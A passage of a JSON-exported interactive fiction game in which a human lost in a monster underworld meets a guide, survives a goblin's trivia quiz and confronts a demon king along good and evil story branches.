"cleanText": "You go straight through the forest and after a bit of walking you see large gates.\nWilbur: These are the castle gates. There's a town and then inside the castle there is a staircase that leads straight to the human world.\nYou: Maybe I can show you my world and my house!\nWilbur: Heh I wish. Everyone knows monsters were banished to this underground world. \nYou: What?\nWilbur: 2,000 years ago, humans and monsters lived together. Monsters have certain qualities that humans find repulsive and the monsters that humans couldn't tame like dogs simply got thrown into this prison. Ever since then the royal family keeps all monsters in here lest the humans return to exact their revenge. You don't seem so bad though.\nYou: That's crazy I never knew any of that?\nWilbur: That surprising. Maybe that's why Harry got out so easily.\nYou: Harry?\nWilbur: Oh yea he was this real tall monkey looking like creature, he had huge feet.\nYou: Bigfoot?\nWilbur: hehe that's what we called him in gradeschool how did you know?\nYou: Just uh guessing..."
},
{
"name": "CastleGates",
"tags": "",
"id": "28",
"text": "You walk through 2 large doors and walk into a town with all different kinds of monsters. Some large and hairy and others small and slimy. A parade of skeletons dances by and before you can question how that's even possible Wilbur darts past you.\nWilbur: They're having a banana sale at the banana store!\nYou let out a sigh and wonder how many more times this will happen. You see a grandious door which is being guarded by a rather large goblin. You contemplate waiting for Wilbur but he looks pretty absorbed in the bananas because he's a bad guide. You are a decent guy why not try mingling with the skeletons?\n\n[[BANANA->BananaStore]]\n[[GOBLIN->Door]]\n[[TALK->Skeleton]]",
"links": [
{
"linkText": "BANANA",
"passageName": "BananaStore",
"original": "[[BANANA->BananaStore]]"
},
{
"linkText": "GOBLIN",
"passageName": "Door",
"original": "[[GOBLIN->Door]]"
},
{
"linkText": "TALK",
"passageName": "Skeleton",
"original": "[[TALK->Skeleton]]"
}
],
"hooks": [],
"cleanText": "You walk through 2 large doors and walk into a town with all different kinds of monsters. Some large and hairy and others small and slimy. A parade of skeletons dances by and before you can question how that's even possible Wilbur darts past you.\nWilbur: They're having a banana sale at the banana store!\nYou let out a sigh and wonder how many more times this will happen. You see a grandious door which is being guarded by a rather large goblin. You contemplate waiting for Wilbur but he looks pretty absorbed in the bananas because he's a bad guide. You are a decent guy why not try mingling with the skeletons?"
},
{
"name": "CastleGatesEvil",
"tags": "",
"id": "29",
"text": "You walk through two huge gates. It's a ghost town. Not a single person. You breath a sigh of relief as you don't want to have to kill more monsters.\nWilbur: Here we are Slippy. Why don't you explore for a little bit. I'll wait for you by the castle gates.\n\n[[NEXT->Town]]",
"links": [
{
"linkText": "NEXT",
"passageName": "Town",
"original": "[[NEXT->Town]]"
}
],
"hooks": [],
"cleanText": "You walk through two huge gates. It's a ghost town. Not a single person. You breath a sigh of relief as you don't want to have to kill more monsters.\nWilbur: Here we are Slippy. Why don't you explore for a little bit. I'll wait for you by the castle gates."
},
{
"name": "BananaStore",
"tags": "",
"id": "30",
"text": "You approach the banana store and peer inside. Wilbur has more bananas than he can hold. He's gonna be there for awhile.\n\n[[BACK->CastleGate1]]",
"links": [
{
"linkText": "BACK",
"passageName": "CastleGate1",
"original": "[[BACK->CastleGate1]]"
}
],
"hooks": [],
"cleanText": "You approach the banana store and peer inside. Wilbur has more bananas than he can hold. He's gonna be there for awhile."
},
{
"name": "Door",
"tags": "",
"id": "31",
"text": "You approach the door and the large goblin steps forward.\nGoblin: What business do you have here?\nYou: I wish to speak to the demon king.\nGoblin: Hehe you must have a deathwish to see him dressed as a human.\nYou: I am a human.\nThe Goblin stands there in awe for a second.\nGoblin: Ok so I'm gonna radio my supervisor I'm not sure how to handle this kind of situation.\nYou: By all means, I would hate to make you job harder.\nYou and the goblin exchange an awkward forced smile as he walks off to get his radio.\n\n[[NEXT->Door1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "Door1",
"original": "[[NEXT->Door1]]"
}
],
"hooks": [],
"cleanText": "You approach the door and the large goblin steps forward.\nGoblin: What business do you have here?\nYou: I wish to speak to the demon king.\nGoblin: Hehe you must have a deathwish to see him dressed as a human.\nYou: I am a human.\nThe Goblin stands there in awe for a second.\nGoblin: Ok so I'm gonna radio my supervisor I'm not sure how to handle this kind of situation.\nYou: By all means, I would hate to make you job harder.\nYou and the goblin exchange an awkward forced smile as he walks off to get his radio."
},
{
"name": "Skeleton",
"tags": "",
"id": "32",
"text": "You approach the skeletons.\nYou: Did you know skeletons get extremely lonely becuase they have no body?\nThe skeletons look at eachother and whisper a bit and look back at you angry.\nSkeleton 1: That's really messed up dude.\nSkeleton 2: Yea where are your friends meatbag??\nSkeleton 3: What a jerk dude. Now I don't want to go to the bonequet.\nSkeleton 1: Don't mind him amigo, he probably has some sort of bone deformity to make him look like that.\nYou feel more insulted than them but because you were the aggressor you sulk away.\n\n[[BACK->CastleGate1]]",
"links": [
{
"linkText": "BACK",
"passageName": "CastleGate1",
"original": "[[BACK->CastleGate1]]"
}
],
"hooks": [],
"cleanText": "You approach the skeletons.\nYou: Did you know skeletons get extremely lonely becuase they have no body?\nThe skeletons look at eachother and whisper a bit and look back at you angry.\nSkeleton 1: That's really messed up dude.\nSkeleton 2: Yea where are your friends meatbag??\nSkeleton 3: What a jerk dude. Now I don't want to go to the bonequet.\nSkeleton 1: Don't mind him amigo, he probably has some sort of bone deformity to make him look like that.\nYou feel more insulted than them but because you were the aggressor you sulk away."
},
{
"name": "CastleGate1",
"tags": "",
"id": "33",
"text": "Banana store, gate guarded by a goblin, or mingle with the skeletons?\n\n[[BANANA->BananaStore]]\n[[GOBLIN->Door]]\n[[TALK->Skeleton]]",
"links": [
{
"linkText": "BANANA",
"passageName": "BananaStore",
"original": "[[BANANA->BananaStore]]"
},
{
"linkText": "GOBLIN",
"passageName": "Door",
"original": "[[GOBLIN->Door]]"
},
{
"linkText": "TALK",
"passageName": "Skeleton",
"original": "[[TALK->Skeleton]]"
}
],
"hooks": [],
"cleanText": "Banana store, gate guarded by a goblin, or mingle with the skeletons?"
},
{
"name": "Door1",
"tags": "",
"id": "34",
"text": "After awhile the goblin lumbers back.\nGoblin: Ok so I talked to my manager and I have to kill you.\nYou: Ah ok understandable- Wait what??\nGoblin: Sorry, company policy. You seem like a nice guy but I have a real shot at grunt manager and this will really boost my chances.\nYou: Please don't hurt me!\nGoblin: Wow you really are a human. Us goblins are really weak, we attack in gameshow trivia. If you lose you die.\nYou: Why do you guard doors then?\nGoblin: Listen pal, I don't make the rules. Get ready for Jeopardy!\n\n[[NEXT->Question1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "Question1",
"original": "[[NEXT->Question1]]"
}
],
"hooks": [],
"cleanText": "After awhile the goblin lumbers back.\nGoblin: Ok so I talked to my manager and I have to kill you.\nYou: Ah ok understandable- Wait what??\nGoblin: Sorry, company policy. You seem like a nice guy but I have a real shot at grunt manager and this will really boost my chances.\nYou: Please don't hurt me!\nGoblin: Wow you really are a human. Us goblins are really weak, we attack in gameshow trivia. If you lose you die.\nYou: Why do you guard doors then?\nGoblin: Listen pal, I don't make the rules. Get ready for Jeopardy!"
},
{
"name": "Question1",
"tags": "",
"id": "35",
"text": "Goblin: Question 1! Which US president delivered the Gettysberg address?\nA: George Washington\nB: Abraham Lincoln\nC: Betty White (It's gonna happen)\nD: Barack Obama\nYou: How would you even know this?\nGoblin: Don't think about it!\n\n[[A->Death]]\n[[B->Question2]]\n[[C->Death]]\n[[D->Death]]",
"links": [
{
"linkText": "A",
"passageName": "Death",
"original": "[[A->Death]]"
},
{
"linkText": "B",
"passageName": "Question2",
"original": "[[B->Question2]]"
},
{
"linkText": "C",
"passageName": "Death",
"original": "[[C->Death]]"
},
{
"linkText": "D",
"passageName": "Death",
"original": "[[D->Death]]"
}
],
"hooks": [],
"cleanText": "Goblin: Question 1! Which US president delivered the Gettysberg address?\nA: George Washington\nB: Abraham Lincoln\nC: Betty White (It's gonna happen)\nD: Barack Obama\nYou: How would you even know this?\nGoblin: Don't think about it!"
},
{
"name": "Death",
"tags": "",
"id": "36",
"score": -1,
"text": "You died! Respawn?\n\n[[RESPAWN->Door1]]",
"links": [
{
"linkText": "RESPAWN",
"passageName": "Door1",
"original": "[[RESPAWN->Door1]]"
}
],
"hooks": [],
"cleanText": "You died! Respawn?"
},
{
"name": "Question2",
"tags": "",
"id": "37",
"score": 10,
"text": "Goblin: Question 2! How long does a day last on Uranus?\nA: 17 Hours\nB: 24 Hours (duh!)\nC: 3 times as long as a day on mercury\nD: A year\nYou: You guys know about Uranus??\n\n[[A->Question3]]\n[[B->Death]]\n[[C->Death]]\n[[D->Death]]",
"links": [
{
"linkText": "A",
"passageName": "Question3",
"original": "[[A->Question3]]"
},
{
"linkText": "B",
"passageName": "Death",
"original": "[[B->Death]]"
},
{
"linkText": "C",
"passageName": "Death",
"original": "[[C->Death]]"
},
{
"linkText": "D",
"passageName": "Death",
"original": "[[D->Death]]"
}
],
"hooks": [],
"cleanText": "Goblin: Question 2! How long does a day last on Uranus?\nA: 17 Hours\nB: 24 Hours (duh!)\nC: 3 times as long as a day on mercury\nD: A year\nYou: You guys know about Uranus??"
},
{
"name": "Question3",
"tags": "",
"id": "38",
"score": 10,
"text": "Goblin: Ok nerd, here's one you can't google!\nGoblin: Question 3! What's the demon king's real name?\nA: Matthew\nB: Jason\nC: Markus\nD: Alexander\nYou: How am I supposed to know that??\nGoblin: Hehe sounds like I'm about to become a manager.\n\n[[A->Death]]\n[[B->Death]]\n[[C->Goblin]]\n[[D->Death]]",
"links": [
{
"linkText": "A",
"passageName": "Death",
"original": "[[A->Death]]"
},
{
"linkText": "B",
"passageName": "Death",
"original": "[[B->Death]]"
},
{
"linkText": "C",
"passageName": "Goblin",
"original": "[[C->Goblin]]"
},
{
"linkText": "D",
"passageName": "Death",
"original": "[[D->Death]]"
}
],
"hooks": [],
"cleanText": "Goblin: Ok nerd, here's one you can't google!\nGoblin: Question 3! What's the demon king's real name?\nA: Matthew\nB: Jason\nC: Markus\nD: Alexander\nYou: How am I supposed to know that??\nGoblin: Hehe sounds like I'm about to become a manager."
},
{
"name": "Goblin",
"tags": "",
"id": "39",
"score": 10,
"text": "Goblin: You jerk! You just kept dying and guessing!\nYou: No I didn't I just know someone else with that name!\nGoblin: Ahhhh you are clearly superior you will be my boss one day my 5th grade teacher was riiiiiigggghhhtttttt. . ..\nThe goblin stumbles around in faux agony and then hides behind a bush.\nGoblin: Wait! I'll just take you to the demon king and get the reward from the head honcho! I'll be famous!\nYou: No don't!\nYou think back to your earlier conversation. If he's that weak you can take him. Wanna try?\n\n[[FIGHT->GoblinEvil]]\n[[TAlK->GoblinGood]]",
"links": [
{
"linkText": "FIGHT",
"passageName": "GoblinEvil",
"original": "[[FIGHT->GoblinEvil]]"
},
{
"linkText": "TALK",
"passageName": "GoblinGood",
"original": "[[TALK->GoblinGood]]"
}
],
"hooks": [],
"cleanText": "Goblin: You jerk! You just kept dying and guessing!\nYou: No I didn't I just know someone else with that name!\nGoblin: Ahhhh you are clearly superior you will be my boss one day my 5th grade teacher was riiiiiigggghhhtttttt. . ..\nThe goblin stumbles around in faux agony and then hides behind a bush.\nGoblin: Wait! I'll just take you to the demon king and get the reward from the head honcho! I'll be famous!\nYou: No don't!\nYou think back to your earlier conversation. If he's that weak you can take him. Wanna try?"
},
{
"name": "GoblinEvil",
"tags": "",
"id": "40",
"score": -10,
"text": "You attack the goblin and easily beat him into submission. He fades away into smoke. He's gone. You look around and so is everyone else. What was once a bustling town was now a ghost town. You can't focus on that now though. What's done is done. Time to go home.\nWilbur: Hey Slippy where'd everyone go?\nYou: Uh I don't know! Don't ask me!\nWilbur: Geez dude calm down. Here, the castle gates are open. Let's go inside.\n\n[[NEXT->FortressEntranceEvil]]",
"links": [
{
"linkText": "NEXT",
"passageName": "FortressEntranceEvil",
"original": "[[NEXT->FortressEntranceEvil]]"
}
],
"hooks": [],
"cleanText": "You attack the goblin and easily beat him into submission. He fades away into smoke. He's gone. You look around and so is everyone else. What was once a bustling town was now a ghost town. You can't focus on that now though. What's done is done. Time to go home.\nWilbur: Hey Slippy where'd everyone go?\nYou: Uh I don't know! Don't ask me!\nWilbur: Geez dude calm down. Here, the castle gates are open. Let's go inside."
},
{
"name": "GoblinGood",
"tags": "",
"id": "41",
"score": 10,
"text": "You: Please don't sir! I just want to go home and see my family!\nGoblin: Y-You're right I'm sorry. I can't let my greed end another's life. Please accept my apology and go ahead.\nHe motions you ahead and a familiar face runs through the crowd with more bananas than you can count stored in incredibly creative ways.\nWilbur: Heya Slippy! Sorry, the banana store was having a sale!\nYou sigh a little bit but motion Wilbur to go first since he's your terrible guide and you need to find the thrown room.\nWilbur: Let's go!\nGoblin: Good luck kid!\nYou and the goblin exchange a much more genuine smile than before and then you enter the castle to finally face this demon king.\n\n[[NEXT->FortessEntranceGood]]",
"links": [
{
"linkText": "NEXT",
"passageName": "FortessEntranceGood",
"original": "[[NEXT->FortessEntranceGood]]"
}
],
"hooks": [],
"cleanText": "You: Please don't sir! I just want to go home and see my family!\nGoblin: Y-You're right I'm sorry. I can't let my greed end another's life. Please accept my apology and go ahead.\nHe motions you ahead and a familiar face runs through the crowd with more bananas than you can count stored in incredibly creative ways.\nWilbur: Heya Slippy! Sorry, the banana store was having a sale!\nYou sigh a little bit but motion Wilbur to go first since he's your terrible guide and you need to find the thrown room.\nWilbur: Let's go!\nGoblin: Good luck kid!\nYou and the goblin exchange a much more genuine smile than before and then you enter the castle to finally face this demon king."
},
{
"name": "FortressEntranceEvil",
"tags": "",
"id": "42",
"text": "You follow Wilbur into the halls of the demon king. It's empty. This is your moment. When the times strikes you'll end him and finally go home.\nWilbur: I know what you did.\nYou: Did what?\nWilbur: You're digusting. I finally understand why the demon king hates humans. They really are vile and disgusting creatures.\nYou: I had to!\nWilbur: No one has to do anything. Especially kill.\nOn that note, it's time to face you destiny.\n\n[[NEXT->ThroneRoomEvil]]",
"links": [
{
"linkText": "NEXT",
"passageName": "ThroneRoomEvil",
"original": "[[NEXT->ThroneRoomEvil]]"
}
],
"hooks": [],
"cleanText": "You follow Wilbur into the halls of the demon king. It's empty. This is your moment. When the times strikes you'll end him and finally go home.\nWilbur: I know what you did.\nYou: Did what?\nWilbur: You're digusting. I finally understand why the demon king hates humans. They really are vile and disgusting creatures.\nYou: I had to!\nWilbur: No one has to do anything. Especially kill.\nOn that note, it's time to face you destiny."
},
{
"name": "FortessEntranceGood",
"tags": "",
"id": "43",
"text": "You follow Wilbur into the mighty halls of the demon king. Oddly enough, there are no portraits of the demon king nor are there any statues or any depictions of the demon king. Wilbur walks slowly through the halls to give you time to admire their magnitude. This is the first time he's been a good guide. There are a lot of guards around the place. They are tall mighty human shaped figures with the heads of eagles. Easily 7 feet tall and just as magnificent as the halls they roam.\nWilbur: The throne room is just up ahead. Anything you wanna know about the demon king before you meet him?\n\n[[YES->QuestionDemonKing]]\n[[NO->ThroneRoom]]",
"links": [
{
"linkText": "YES",
"passageName": "QuestionDemonKing",
"original": "[[YES->QuestionDemonKing]]"
},
{
"linkText": "NO",
"passageName": "ThroneRoom",
"original": "[[NO->ThroneRoom]]"
}
],
"hooks": [],
"cleanText": "You follow Wilbur into the mighty halls of the demon king. Oddly enough, there are no portraits of the demon king nor are there any statues or any depictions of the demon king. Wilbur walks slowly through the halls to give you time to admire their magnitude. This is the first time he's been a good guide. There are a lot of guards around the place. They are tall mighty human shaped figures with the heads of eagles. Easily 7 feet tall and just as magnificent as the halls they roam.\nWilbur: The throne room is just up ahead. Anything you wanna know about the demon king before you meet him?"
},
{
"name": "Town",
"tags": "",
"id": "44",
"text": "You look and see an abandoned banana store, Wilbur standing by the castle gates, and what looks to be footprints. What will you do?\n\n[[BANANA->BananaEvil]]\n[[WILBUR->DoorEvil]]\n[[FOOTPRINTS->FootPrints]]",
"links": [
{
"linkText": "BANANA",
"passageName": "BananaEvil",
"original": "[[BANANA->BananaEvil]]"
},
{
"linkText": "WILBUR",
"passageName": "DoorEvil",
"original": "[[WILBUR->DoorEvil]]"
},
{
"linkText": "FOOTPRINTS",
"passageName": "FootPrints",
"original": "[[FOOTPRINTS->FootPrints]]"
}
],
"hooks": [],
"cleanText": "You look and see an abandoned banana store, Wilbur standing by the castle gates, and what looks to be footprints. What will you do?"
},
{
"name": "BananaEvil",
"tags": "",
"id": "45",
"text": "You drift over to the banana store. Theres banans and random junk all over the place. It's almost like everyone up and vanished.\n\n[[BACK->Town]]",
"links": [
{
"linkText": "BACK",
"passageName": "Town",
"original": "[[BACK->Town]]"
}
],
"hooks": [],
"cleanText": "You drift over to the banana store. Theres banans and random junk all over the place. It's almost like everyone up and vanished."
},
{
"name": "DoorEvil",
"tags": "",
"id": "46",
"text": "You walk over to Wilbur by the giant pair of doors that lead to the castle of the great demon king.\nWilbur: I bet you're wondering where everyone went huh?\nYou: Kinda yea, I figured it was abandoned.\nWilbur: Now it is.\nWilbur opens the door and walks inside. I guess follow him?\n\n[[NEXT->FortessEntranceOrville]]",
"links": [
{
"linkText": "NEXT",
"passageName": "FortessEntranceOrville",
"original": "[[NEXT->FortessEntranceOrville]]"
}
],
"hooks": [],
"cleanText": "You walk over to Wilbur by the giant pair of doors that lead to the castle of the great demon king.\nWilbur: I bet you're wondering where everyone went huh?\nYou: Kinda yea, I figured it was abandoned.\nWilbur: Now it is.\nWilbur opens the door and walks inside. I guess follow him?"
},
{
"name": "FootPrints",
"tags": "",
"id": "47",
"text": "You walk over to the footprints and examine them. They look like human footprints but almost as if they were missing flesh. So a skeleton I guess? They could've made great friends I bet.\n\n[[BACK->Town]]",
"links": [
{
"linkText": "BACK",
"passageName": "Town",
"original": "[[BACK->Town]]"
}
],
"hooks": [],
"cleanText": "You walk over to the footprints and examine them. They look like human footprints but almost as if they were missing flesh. So a skeleton I guess? They could've made great friends I bet."
},
{
"name": "FortessEntranceOrville",
"tags": "",
"id": "48",
"text": "You follow Wilbur into the halls of the demon king. It's empty. As you follow Wilbur to the throne room you feel the full force of guilt.\nWilbur: The demon king really was right. Humans are vile creatures.\nYou: I'm sorry.\nWilbur: Sorry doesn't bring him back.\nYou: I don't know what came out of me.\nWilbur: You weren't possessed by anything. There is no nasty entity controlling you. You are that entity.\nOn that note, you should just shut up. It's time to end the demon king.\n\n[[NEXT->ThroneRoomOrville]]",
"links": [
{
"linkText": "NEXT",
"passageName": "ThroneRoomOrville",
"original": "[[NEXT->ThroneRoomOrville]]"
}
],
"hooks": [],
"cleanText": "You follow Wilbur into the halls of the demon king. It's empty. As you follow Wilbur to the throne room you feel the full force of guilt.\nWilbur: The demon king really was right. Humans are vile creatures.\nYou: I'm sorry.\nWilbur: Sorry doesn't bring him back.\nYou: I don't know what came out of me.\nWilbur: You weren't possessed by anything. There is no nasty entity controlling you. You are that entity.\nOn that note, you should just shut up. It's time to end the demon king."
},
{
"name": "QuestionDemonKing",
"tags": "",
"id": "49",
"text": "Here are the questions you can ask Wilbur.\nA: What is the demon king like?\nB: Why is he called the demon king?\nC: Why does he hate humans?\nD: Is his real name Markus?\n\n[[A->AnswerA]]\n[[B->AnswerB]]\n[[C->AnswerC]]\n[[D->AnswerD]]\n[[BACK->FortessEntranceGood]]",
"links": [
{
"linkText": "A",
"passageName": "AnswerA",
"original": "[[A->AnswerA]]"
},
{
"linkText": "B",
"passageName": "AnswerB",
"original": "[[B->AnswerB]]"
},
{
"linkText": "C",
"passageName": "AnswerC",
"original": "[[C->AnswerC]]"
},
{
"linkText": "D",
"passageName": "AnswerD",
"original": "[[D->AnswerD]]"
},
{
"linkText": "BACK",
"passageName": "FortessEntranceGood",
"original": "[[BACK->FortessEntranceGood]]"
}
],
"hooks": [],
"cleanText": "Here are the questions you can ask Wilbur.\nA: What is the demon king like?\nB: Why is he called the demon king?\nC: Why does he hate humans?\nD: Is his real name Markus?"
},
{
"name": "ThroneRoom",
"tags": "",
"id": "50",
"text": "You open the door to a peaceful serene garden. In the middle a tall figure in golden robes slowly turns your way.\nDemon King: Hello human.\nHe examines you. His eyes cold as steel. He knows he is better than you and he gets extremely close by bending forward. His dark hair covers his silver eyes before he backs away and resumes his royal stance.\nDemon King: What do you want child?\nYou turn to Wilbur for help frozen in fear but he's gone. It's just you and the demon king.\nDemon King: All humans in my chambers want only one thing. To leave. Am I correct?\nYou: Yes sir. I fell down here with my friend and I heard this is my only way out.\nDemon King: Some friend you are. Why did you leave your friend behind?\nWill you tell the truth or lie?\n\n[[TRUTH->ThroneRoomTruth]]\n[[LIE->ThroneRoomLie]]",
"links": [
{
"linkText": "TRUTH",
"passageName": "ThroneRoomTruth",
"original": "[[TRUTH->ThroneRoomTruth]]"
},
{
"linkText": "LIE",
"passageName": "ThroneRoomLie",
"original": "[[LIE->ThroneRoomLie]]"
}
],
"hooks": [],
"cleanText": "You open the door to a peaceful serene garden. In the middle a tall figure in golden robes slowly turns your way.\nDemon King: Hello human.\nHe examines you. His eyes cold as steel. He knows he is better than you and he gets extremely close by bending forward. His dark hair covers his silver eyes before he backs away and resumes his royal stance.\nDemon King: What do you want child?\nYou turn to Wilbur for help frozen in fear but he's gone. It's just you and the demon king.\nDemon King: All humans in my chambers want only one thing. To leave. Am I correct?\nYou: Yes sir. I fell down here with my friend and I heard this is my only way out.\nDemon King: Some friend you are. Why did you leave your friend behind?\nWill you tell the truth or lie?"
},
{
"name": "AnswerA",
"tags": "",
"id": "51",
"text": "Wilbur: He's a human. He's very kind and always helps people and doesn't see himself as a king. Rumor has it that he's the first human to enter the monster world. He always gives his possessions away and makes sure all monster kind is taken care of and fed. He just doesn't like humans.\n\n[[BACK->QuestionDemonKing]]",
"links": [
{
"linkText": "BACK",
"passageName": "QuestionDemonKing",
"original": "[[BACK->QuestionDemonKing]]"
}
],
"hooks": [],
"cleanText": "Wilbur: He's a human. He's very kind and always helps people and doesn't see himself as a king. Rumor has it that he's the first human to enter the monster world. He always gives his possessions away and makes sure all monster kind is taken care of and fed. He just doesn't like humans."
},
{
"name": "AnswerB",
"tags": "",
"id": "52",
"text": "Wilbur: I'm not quite sure. Maybe he thought it would fit in with the aesthetic of being a monster. He's a huge softy so I tend not to see him as a huge big bad intimidating demon.\n\n[[BACK->QuestionDemonKing]]",
"links": [
{
"linkText": "BACK",
"passageName": "QuestionDemonKing",
"original": "[[BACK->QuestionDemonKing]]"
}
],
"hooks": [],
"cleanText": "Wilbur: I'm not quite sure. Maybe he thought it would fit in with the aesthetic of being a monster. He's a huge softy so I tend not to see him as a huge big bad intimidating demon."
},
{
"name": "AnswerC",
"tags": "",
"id": "53",
"text": "Wilbur: He says it's because they are untrustworthy and vile. He says he lost faith in humans when he came here and that the monsters here are so kind when they took him in that he vowed to extreminate every human that dare enter monster territory.\n\n[[BACK->QuestionDemonKing]]",
"links": [
{
"linkText": "BACK",
"passageName": "QuestionDemonKing",
"original": "[[BACK->QuestionDemonKing]]"
}
],
"hooks": [],
"cleanText": "Wilbur: He says it's because they are untrustworthy and vile. He says he lost faith in humans when he came here and that the monsters here are so kind when they took him in that he vowed to extreminate every human that dare enter monster territory."
},
{
"name": "AnswerD",
"tags": "",
"id": "54",
"text": "Wilbur: Yea how did you know that?\n\n[[BACK->QuestionDemonKing]]",
"links": [
{
"linkText": "BACK",
"passageName": "QuestionDemonKing",
"original": "[[BACK->QuestionDemonKing]]"
}
],
"hooks": [],
"cleanText": "Wilbur: Yea how did you know that?"
},
{
"name": "ThroneRoomEvil",
"tags": "",
"id": "55",
"text": "You walk into the throne room and see the demon king. He is tall and has dark hair. He slowly turns to you but you immediately take the chance to attack him. He easily dodges and kicks you against the wall.\nDemon King: Foolish boy. Such an action is a sign that the human world has not changed. You are so corrupted by violence that you try to attack me? You truly are disgusting.\nThe demon king leans in close. His silver eyes pierce your soul. \nDemon King: You have changed old friend. The world of monsters has judged you and found you guilty. You see, the realm of monsters is not like that of humans. As part of the curse that locks all monster-kind here we are forever stuck in a loop. Our history is doomed to repeat forever. In this timeline you have chosen violence.\nYou finally realize who the demon king really is.\nDemon King: I can tell by your reaction you know exactly who I am. I am not your mark however. I am a Mark from a timeline where my actions were tried and true, as such I was judged and rewarded with my position.\n\n[[NEXT->ThroneRoomEvil1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "ThroneRoomEvil1",
"original": "[[NEXT->ThroneRoomEvil1]]"
}
],
"hooks": [],
"cleanText": "You walk into the throne room and see the demon king. He is tall and has dark hair. He slowly turns to you but you immediately take the chance to attack him. He easily dodges and kicks you against the wall.\nDemon King: Foolish boy. Such an action is a sign that the human world has not changed. You are so corrupted by violence that you try to attack me? You truly are disgusting.\nThe demon king leans in close. His silver eyes pierce your soul. \nDemon King: You have changed old friend. The world of monsters has judged you and found you guilty. You see, the realm of monsters is not like that of humans. As part of the curse that locks all monster-kind here we are forever stuck in a loop. Our history is doomed to repeat forever. In this timeline you have chosen violence.\nYou finally realize who the demon king really is.\nDemon King: I can tell by your reaction you know exactly who I am. I am not your mark however. I am a Mark from a timeline where my actions were tried and true, as such I was judged and rewarded with my position."
},
{
"name": "ThroneRoomOrville",
"tags": "",
"id": "56",
"text": "You walk into the throne room and see the demon king. He is tall and has dark hair. He slowly turns to you but you immediately take the chance to attack him. He easily dodges and kicks you against the wall.\nDemon King: Foolish boy. Such an action is a sign that the human world has not changed. You are so corrupted by violence that you try to attack me? You truly are disgusting.\nThe demon king leans in close. His silver eyes pierce your soul. \nDemon King: You have changed old friend. The world of monsters has judged you and found you guilty. You see, the realm of monsters is not like that of humans. As part of the curse that locks all monster-kind here we are forever stuck in a loop. Our history is doomed to repeat forever. In this timeline you have chosen violence.\nYou finally realize who the demon king really is.\nDemon King: I can tell by your reaction you know exactly who I am. I am not your mark however. I am a Mark from a timeline where my actions were tried and true, as such I was judged and rewarded with my position.\n\n[[NEXT->ThroneRoomOrville1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "ThroneRoomOrville1",
"original": "[[NEXT->ThroneRoomOrville1]]"
}
],
"hooks": [],
"cleanText": "You walk into the throne room and see the demon king. He is tall and has dark hair. He slowly turns to you but you immediately take the chance to attack him. He easily dodges and kicks you against the wall.\nDemon King: Foolish boy. Such an action is a sign that the human world has not changed. You are so corrupted by violence that you try to attack me? You truly are disgusting.\nThe demon king leans in close. His silver eyes pierce your soul. \nDemon King: You have changed old friend. The world of monsters has judged you and found you guilty. You see, the realm of monsters is not like that of humans. As part of the curse that locks all monster-kind here we are forever stuck in a loop. Our history is doomed to repeat forever. In this timeline you have chosen violence.\nYou finally realize who the demon king really is.\nDemon King: I can tell by your reaction you know exactly who I am. I am not your mark however. I am a Mark from a timeline where my actions were tried and true, as such I was judged and rewarded with my position."
},
{
"name": "ThroneRoomTruth",
"tags": "",
"id": "57",
"score": 5,
"text": "You: I left him behind because I was selfish and abandoned him.\nThe demon king smirks.\nDemon King: I know. You are no different than all humans. Although I appreciate you honesty, you must pay for your kind's sins.\nYou: But I didn't do anything evil! It's not my fault humans treated you badly!\nThe demon king slowly walks around his garden smelling the flowers and examining the vegetables he grew. You look up and notice the sun shines down directly onto his garden.\nDemon King: You claim innocence yet do nothing to stop evil actions? You abandon your friend and lecture me on morals? You watch and commit abuses yourself and live among monsters and still don't recognize who the real monster is?\n\n[[NEXT->ThroneRoom1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "ThroneRoom1",
"original": "[[NEXT->ThroneRoom1]]"
}
],
"hooks": [],
"cleanText": "You: I left him behind because I was selfish and abandoned him.\nThe demon king smirks.\nDemon King: I know. You are no different than all humans. Although I appreciate you honesty, you must pay for your kind's sins.\nYou: But I didn't do anything evil! It's not my fault humans treated you badly!\nThe demon king slowly walks around his garden smelling the flowers and examining the vegetables he grew. You look up and notice the sun shines down directly onto his garden.\nDemon King: You claim innocence yet do nothing to stop evil actions? You abandon your friend and lecture me on morals? You watch and commit abuses yourself and live among monsters and still don't recognize who the real monster is?"
},
{
"name": "ThroneRoomLie",
"tags": "",
"id": "58",
"score": -5,
"text": "You: I-I tried looking for him but I assumed the worst had happened so I continued on.\nThe demon king gets in your face extremely quickly. With his robes still in the air from his dash, he leans into your ear.\nDemon King: Don't lie to me boy. I own this domain and see all that happens within it.\nYou clench your fists and start to tear up but quickly wipe them away as he backs off.\nDemon King: All humans are so vile and disgusting. You live among monsters and do not yet see that you are the true monster.\n\n[[NEXT->ThroneRoom1]]",
"links": [
{
"linkText": "NEXT",
"passageName": "ThroneRoom1",
"original": "[[NEXT->ThroneRoom1]]"
}
],
"hooks": [],
"cleanText": "You: I-I tried looking for him but I assumed the worst had happened so I continued on.\nThe demon king gets in your face extremely quickly. With his robes still in the air from his dash, he leans into your ear.\nDemon King: Don't lie to me boy. I own this domain and see all that happens within it.\nYou clench your fists and start to tear up but quickly wipe them away as he backs off.\nDemon King: All humans are so vile and disgusting. You live among monsters and do not yet see that you are the true monster."
},
{
"name": "ThroneRoom1",
"tags": "",
"id": "59",
"text": "You take a deep breath and look at him and it finally clicks in your head.\nYou: Mark?\nThe demon king laughs.\nDemon King: Yes, but not your Mark. You see, the realm of monsters is not like that of humans. As part of the curse that locks all monster-kind here we are forever stuck in a loop. Our history is doomed to repeat forever. Though I have not been called that for ages, I am a version of Mark that has walked a tried and true path. The realm of monsters has judged you and seen your path. As such, you will be permitted to leave. I will give you the option to stay as the monsters have taken a liking to you.\nYou turn around and see Wilbur and his brother Orville and the goblin standing in the entrance. The demon king smiles. What will it be friend?\n\n[[STAY->GoodEndingStay]]\n[[LEAVE->GoodEndingLeave]]\n[[DELETETHISONE->SecretEnding]]",
"links": [
{
"linkText": "STAY",
"passageName": "GoodEndingStay",
"original": "[[STAY->GoodEndingStay]]"
},
{
"linkText": "LEAVE",
"passageName": "GoodEndingLeave",
"original": "[[LEAVE->GoodEndingLeave]]"
},
{
"linkText": "SECRET",
"passageName": "SecretEnding",
"original": "[[DELETETHISONE->SecretEnding]]"
}
],
"hooks": [],
